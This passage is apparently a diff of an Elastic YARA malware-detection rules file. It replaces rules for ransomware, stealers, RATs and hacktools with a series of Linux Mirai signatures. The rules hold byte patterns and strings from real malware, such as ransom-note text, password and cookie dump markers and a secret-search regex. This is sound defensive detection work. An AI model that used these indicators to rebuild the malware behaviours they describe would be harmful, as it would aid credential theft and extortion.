"1ab463fce01148c2cc95659fdf8b05e597d9b4eeabe81a9cdfa1da3632d72291" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "54d3c59ba5ca16fbe99a4629f4fe7464d13f781985a7f35d05604165f9284483" + fingerprint = "e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103591,28 +103941,28 @@ rule ELASTIC_Linux_Hacktool_Cleanlog_3Eb725D1 : FILE MEMORY os = "linux" strings: - $a = { 45 E0 83 45 C0 01 EB 11 83 45 DC 01 EB 0B 83 45 D8 01 EB 05 83 45 } + $a = { 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D } condition: all of them } -rule ELASTIC_Linux_Hacktool_Cleanlog_400B7595 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_994535C4 : FILE MEMORY { meta: - description = "Detects Linux Hacktool Cleanlog (Linux.Hacktool.Cleanlog)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "400b7595-c3c4-4999-b3b9-dcfe9b5df3f6" + id = "994535c4-77a6-4cc6-b673-ce120be8d0f4" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Cleanlog.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4df4ebcc61ab2cdb8e5112eeb4e2f29e4e841048de43d7426b1ec11afe175bf6" - logic_hash = "e36acf708875efda88143124e11fef5b0e2f99d17b0c49344db969cf0d454db1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1323-L1341" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "376a2771a2a973628e22379b3dbb9a8015c828505bbe18a0c027b5d513c9e90d" + logic_hash = "c83c8c9cdfea1bf322115e5b23d751b226a5dbf42fc41faac172d36192ccf31f" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4423f1597b199046bfc87923e3e229520daa2da68c4c4a3ac69127ace518f19a" + fingerprint = "a3753e29ecf64bef21e062b8dec96ba9066f665919d60976657b0991c55b827b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103620,124 +103970,115 @@ rule ELASTIC_Linux_Hacktool_Cleanlog_400B7595 : FILE MEMORY os = "linux" strings: - $a = { 72 20 65 6E 74 72 79 20 28 64 65 66 61 75 6C 74 3A 20 31 73 74 20 } + $a = { 20 74 07 31 C0 48 FF C3 EB EA FF C0 83 F8 08 75 F4 48 8D 73 03 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Blackhunt_7B46Cb9C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_A68E498C : FILE MEMORY { meta: - description = "Detects Windows Ransomware Blackhunt (Windows.Ransomware.BlackHunt)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "7b46cb9c-4601-4be0-a2de-6a4f27d1a446" - date = "2024-03-12" - modified = "2024-03-21" + id = "a68e498c-0768-4321-ab65-42dd6ef85323" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_BlackHunt.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6c4e968c9b53906ba0e86a41eccdabe2b736238cb126852023e15850e956293d" - logic_hash = "97bb8436574fd814d8278e5a7043e011d0e4f9a7dd9df5e67605f28ac1af1e74" - score = 50 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1343-L1361" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" + logic_hash = "e4552813dc92b397c5ba78f32ee6507520f337b55779a3fc705de7e961f8eb8f" + score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e46e2de840bfd557147e686eb00c350d00f6d1c6b2b8d1df98165c73cbe89ba" + fingerprint = "951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "#BlackHunt_ReadMe.txt" wide fullword - $a2 = "#BlackHunt_Private.key" wide fullword - $a3 = "#BlackHunt_ID.txt" wide fullword - $a4 = "BLACK_HUNT_MUTEX" ascii fullword - $a5 = "BlackKeys" ascii fullword - $a6 = "ENCRYPTED VOLUME : %dGB" ascii fullword - $a7 = "RUNNING TIME : %02dm:%02ds" ascii fullword + $a = { 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Ransomware_Cuba_E64A16B1 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_88De437F : FILE MEMORY { meta: - description = "Detects Windows Ransomware Cuba (Windows.Ransomware.Cuba)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "e64a16b1-262c-4835-bd95-4dde89dd75f4" - date = "2021-08-04" - modified = "2021-10-04" - reference = "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Cuba.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e" - logic_hash = "915425ad49f1b9ebde114f92155d5969ec707304403f46d891d014b399165a4d" + id = "88de437f-9c98-4e1d-96c0-7b433c99886a" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1363-L1381" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" + logic_hash = "233dbf3d13c35f4c9c7078d67ea60086355c801ce6515f9d3c518e95afd39d85" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "840f2ebe2664db9a0918acf7d408ca8060ee0d3c330ad08b36e5be7f7e2cf069" + fingerprint = "c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 } - $HeaderCheck = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 } + $a = { 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0 } condition: - any of them + all of them } -rule ELASTIC_Windows_Ransomware_Cuba_95A98E69 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_95E0056C : FILE MEMORY { meta: - description = "Detects Windows Ransomware Cuba (Windows.Ransomware.Cuba)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "95a98e69-ce6c-40c6-a05b-2366c663ad6e" - date = "2021-08-04" - modified = "2021-10-04" - reference = "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Cuba.yar#L23-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00f18713f860dc8394fb23a1a2b6280d1eb2f20a487c175433a7b495a1ba408d" - logic_hash = "d17ef93943e826613be4c21ad1e41d1daa33db9da0fa6106bb8ba6334ebe1d08" + id = "95e0056c-bc07-42cf-89ab-6c0cde3ccc8a" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1383-L1401" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380" + logic_hash = "9e34891d28034d1f4fc3da5cb99df8fc74f0b876903088f5eab5fe36e0e0e603" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "05cfd7803692149a55d9ced84828422b66e8b301c8c2aae9ca33c6b68e29bcf8" - severity = 90 + fingerprint = "a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "We also inform that your databases, ftp server and file server were downloaded by us to our servers." ascii fullword - $a2 = "Good day. All your files are encrypted. For decryption contact us." ascii fullword - $a3 = ".cuba" wide fullword + $a = { 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Sodinokibi_2883D7Cd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_B548632D : FILE MEMORY { meta: - description = "Detects Linux Ransomware Sodinokibi (Linux.Ransomware.Sodinokibi)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "2883d7cd-fd3b-47a5-9283-a40335172c62" - date = "2022-01-05" - modified = "2022-01-26" + id = "b548632d-7916-444a-aa68-4b3e38251905" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Sodinokibi.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a322b230a3451fd11dcfe72af4da1df07183d6aaf1ab9e062f0e6b14cf6d23cd" - logic_hash = "97d6b1b641c4b5b596b67a809e8e70bb0bccb9219282cd6c41bc905e2ea44c84" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1403-L1421" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "639d9d6da22e84fb6b6fc676a1c4cfd74a8ed546ce8661500ab2ef971242df07" + logic_hash = "bfb46457f8b79548726e3988d649f94e04f26f9e546aae70ece94defae6bab8a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d6570a8e9358cef95388a72b2e7f747ee5092620c4f92a4b4e6c1bb277e1cb36" + fingerprint = "8b355e9c1150d43f52e6e9e052eda87ba158041f7b645f4f67c32dd549c09f28" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103745,28 +104086,27 @@ rule ELASTIC_Linux_Ransomware_Sodinokibi_2883D7Cd : FILE MEMORY os = "linux" strings: - $a = { 85 08 FF FF FF 48 01 85 28 FF FF FF 48 8B 85 08 FF FF FF 48 29 85 20 FF } + $a = { 00 0B 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A } condition: all of them } -rule ELASTIC_Linux_Trojan_Connectback_Bf194C93 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_E0Cf29E2 : FILE MEMORY { meta: - description = "Detects Linux Trojan Connectback (Linux.Trojan.Connectback)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "bf194c93-92d8-4eba-99c4-326a5ea76d0d" + id = "e0cf29e2-88d7-4aa4-b60a-c24626f2b246" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Connectback.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6784cb86460bddf1226f71f5f5361463cbda487f813d19cd88e8a4a1eb1a417b" - logic_hash = "148626e05caee4a2b2542726ea4e4dab074eeab0572a65fdbd32f5d96544daf8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1423-L1440" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "693e27da8cbab32954cc2c9ba648151ad9fc21fe53251628145d7b436ec5e976" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6e72b14be0a0a6e42813fa82ee77d057246ccba4774897b38acf2dc30c894023" + fingerprint = "3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103774,57 +104114,57 @@ rule ELASTIC_Linux_Trojan_Connectback_Bf194C93 : FILE MEMORY os = "linux" strings: - $a = { B6 0C B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 } + $a = { 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01 } condition: all of them } -rule ELASTIC_Macos_Infostealer_Mdquerysecret_5535Ab96 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_1754B331 : FILE MEMORY { meta: - description = "Detects Macos Infostealer Mdquerysecret (MacOS.Infostealer.MdQuerySecret)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "5535ab96-36aa-42ed-ab85-d8fd7fa6a368" - date = "2023-04-11" - modified = "2024-08-19" + id = "1754b331-5704-43c1-91be-89c7a0dd29a4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Infostealer_MdQuerySecret.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c755e617b9dd41505bb225ea836ecdde8f3f6f9ab7ae79697e6d85190e206c41" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1442-L1460" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0d89fc59d0de2584af0e4614a1561d1d343faa766edfef27d1ea96790ac7014b" + logic_hash = "fde04b0e31a00326f9d011198995999ff9b15628f5ff4139ec7dec19ac0c59c9" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4fdad65ffdce106e837bbec747e63269f782a9b1ab2cfa9d2db204d252960ab4" + fingerprint = "35db945d116a4c9264af44a9947a5e831ea655044728dc78770085c7959a678e" severity = 100 - arch_context = "x86, arm64" + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $string1 = /kMDItemTextContent\s{1,50}==\s{1,50}\S{1,50}secret/ ascii wide nocase - $string2 = /kMDItemDisplayName\s{1,50}==\s{1,50}\S{1,50}secret\S{1,50}/ ascii wide nocase + $a = { CF 07 66 5F 10 F0 EB 0C 42 0B 2F 0B 0B 43 C1 42 E4 C2 7C 85 } condition: - any of ($string1,$string2) + all of them } -rule ELASTIC_Linux_Exploit_Race_758A0884 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3278F1B8 : FILE MEMORY { meta: - description = "Detects Linux Exploit Race (Linux.Exploit.Race)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "758a0884-0174-46c8-a57a-980fc04360d0" + id = "3278f1b8-f208-42c8-a851-d22413f74dea" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Race.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a4966baaa34b05cb782071ef114a53cac164e6dece275c862fe96a2cff4a6f06" - logic_hash = "ccba0e2ddefd53939cda6b4985def2d487ac5916cbad7374ac3143f02b9f7ff5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1462-L1480" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" + logic_hash = "4d709e8e2062099ac06b241408e52bcb86bbf8163faaffbcff68a05f864e1b3f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3516086ae773ec1c1de75a54bafbb72ad49b4c7f1661961d5613462b53f26c43" + fingerprint = "7e9fc284c9c920ac2752911d6aacbc3c2bf1b053aa35c22d83bab0089290778d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103832,28 +104172,28 @@ rule ELASTIC_Linux_Exploit_Race_758A0884 : FILE MEMORY os = "linux" strings: - $a = { 00 22 00 00 00 36 00 00 00 18 85 04 08 34 00 00 00 12 00 00 } + $a = { D2 0F B6 C3 C1 E0 10 0F B6 C9 C1 E2 18 09 C2 0F B6 44 24 40 C1 } condition: all of them } -rule ELASTIC_Linux_Trojan_Pnscan_20E34E35 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Ab804Bb7 : FILE MEMORY { meta: - description = "Detects Linux Trojan Pnscan (Linux.Trojan.Pnscan)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "20e34e35-8639-4a0d-bfe3-6bfa1570f14d" + id = "ab804bb7-57ab-48db-85cc-a6d88de0c84a" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Pnscan.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7dbd5b709f16296ba7dac66dc35b9c3373cf88452396d79d0c92d7502c1b0005" - logic_hash = "1e69ef50d25ffd0f38ed0eb81ab3295822aa183c5e06f307caf02826b1dfa011" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1482-L1500" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8f0cc764729498b4cb9c5446f1a84cde54e828e913dc78faf537004a7df21b20" + logic_hash = "cef2ffafe152332502fb0d72d014c81b90dc9ad4f4491f1b2f2f9c1f73cc7958" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "07678bd23ae697d42e2c7337675f7a50034b10ec7a749a8802820904a943641a" + fingerprint = "b9716aa7be1b0e4c966a25a40521114e33c21c7ec3c4468afc1bf8378dd11932" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103861,59 +104201,56 @@ rule ELASTIC_Linux_Trojan_Pnscan_20E34E35 : FILE MEMORY os = "linux" strings: - $a = { 4C 00 54 45 4C 20 3A 20 00 3C 49 41 43 3E 00 3C 44 4F 4E 54 3E 00 } + $a = { 4A 75 05 0F BE 11 01 D0 89 C2 0F B7 C0 C1 FA 10 01 C2 89 D0 C1 } condition: all of them } -rule ELASTIC_Windows_Trojan_Xpertrat_Ce03C41D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Dca3B9B4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Xpertrat (Windows.Trojan.Xpertrat)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "ce03c41d-d5c3-43f5-b3ca-f244f177d710" - date = "2021-08-06" - modified = "2021-10-04" + id = "dca3b9b4-62f3-41ed-a3b3-80dd0990f8c5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Xpertrat.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d7f2fddb43eb63f9246f0a4535dfcca6da2817592455d7eceaacde666cf1aaae" - logic_hash = "f6ff0a11f261bc75c9d0015131f177d39bb9e8e30346a75209ba8fa808ac4fcb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1502-L1520" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a839437deba6d30e7a22104561e38f60776729199a96a71da3a88a7c7990246a" + logic_hash = "f85dfc1c00706d7ac11ef35c41c471383ef8b019a5c2566b27072a5ef5ad5c93" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8aa4336ba6909c820f1164c78453629959e28cb619fda45dbe46291f9fbcbec4" + fingerprint = "b0471831229be1bcbcf6834e2d1a5b85ed66fb612868c2c207fe009ae2a0e799" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "[XpertRAT-Mutex]" wide fullword - $a2 = "XPERTPLUGIN" wide fullword - $a3 = "keylog.tmp" wide fullword + $a = { 83 45 F4 01 8B 45 F4 3B 45 F0 75 11 48 8B 45 F8 48 2B 45 D8 } condition: all of them } -rule ELASTIC_Linux_Trojan_Asacub_D3C4Aa41 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Ae9D0Fa6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Asacub (Linux.Trojan.Asacub)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "d3c4aa41-faae-4c85-bdc5-9e09483e92fb" + id = "ae9d0fa6-be06-4656-9b13-8edfc0ee9e71" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Asacub.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "15044273a506f825859e287689a57c6249b01bb0a848f113c946056163b7e5f1" - logic_hash = "3645e10e5ef8c50e5e82d749da07f5669c5162cb95aa5958ce45a414b870f619" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1522-L1539" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8da5b14b95d96de5ced8bcab98e23973e449c1b5ca101f39a2114bb8e74fd9a5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4961023c719599bd8da6b8a17dbe409911334c21b45d62385dd02a6dd35fd2be" + fingerprint = "ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -103921,226 +104258,202 @@ rule ELASTIC_Linux_Trojan_Asacub_D3C4Aa41 : FILE MEMORY os = "linux" strings: - $a = { 10 8B 0F 83 EC 08 50 57 FF 51 54 83 C4 10 8B 8B DC FF FF FF 89 4C } + $a = { 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Stormkitty_6256031A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_612B407C : FILE MEMORY { meta: - description = "Detects Windows Trojan Stormkitty (Windows.Trojan.StormKitty)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "6256031a-e7dd-423b-a83f-4db428cb3d1b" - date = "2022-03-21" - modified = "2022-04-12" + id = "612b407c-fceb-4a19-8905-2f5b822f62cc" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_StormKitty.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0c69015f534d1da3770dbc14183474a643c4332de6a599278832abd2b15ba027" - logic_hash = "a797e87eaf5b173da9dd43fcff03b3d26198dcafa29c3f2ca369773c73001234" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1541-L1559" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7833bc89778461a9f46cc47a78c67dda48b498ee40b09a80a21e67cb70c6add1" + logic_hash = "6514725a32f7c28be7de5ff6fe1363df7c50e2cd6c8c79824ec4cbeadda2ca31" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6f0463de42c97701b0f3b8172e7e461501357921a3d11e6ca467bd1ca397d0b6" + fingerprint = "c48c26b1052ef832d4d6a106db186bf20c503bdf38392a1661eb2d3c3ec010cd" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "https://github.com/LimerBoy/StormKitty" ascii fullword - $a2 = "127.0.0.1 www.malwarebytes.com" wide fullword - $a3 = "KillDefender" - $a4 = "Username: {1}" wide fullword - $a5 = "# End of Cookies" wide fullword - $a6 = "# End of Passwords" wide fullword + $a = { 11 B2 73 45 2B 7A 57 E2 F9 77 A2 23 EC 7C 0C 29 FE 3F B2 DE 28 6C } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Segwin_04A3962E : FILE +rule ELASTIC_Linux_Trojan_Mirai_D5Da717F : FILE MEMORY { meta: - description = "Name: segwindrvx64.sys, Version: 100.0.7.2" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "04a3962e-4622-4d83-b0e7-4d77c8a81ab6" - date = "2022-04-07" - modified = "2022-04-07" + id = "d5da717f-3344-41a8-884e-8944172ea370" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Segwin.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd" - logic_hash = "1e9ba5fc78f2b4eeee56314c9e8cf3071817d726b44cb8510f8d7069e85ab7bf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1561-L1579" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1f6bcdfc7d1c56228897cd7548266bb0b9a41b913be354036816643ac21b6f66" + logic_hash = "034dae5bea7536e8c8aa22b8b891b9c991b94f04be12c9fe6d78ddf07a2365d9" score = 75 quality = 75 - tags = "FILE" - fingerprint = "e3c5441e4c26f7c5ba5db8a4b7618d870a5dd7b70d9373d80d81497bc0f73739" - threat_name = "Windows.VulnDriver.Segwin" - severity = 50 + 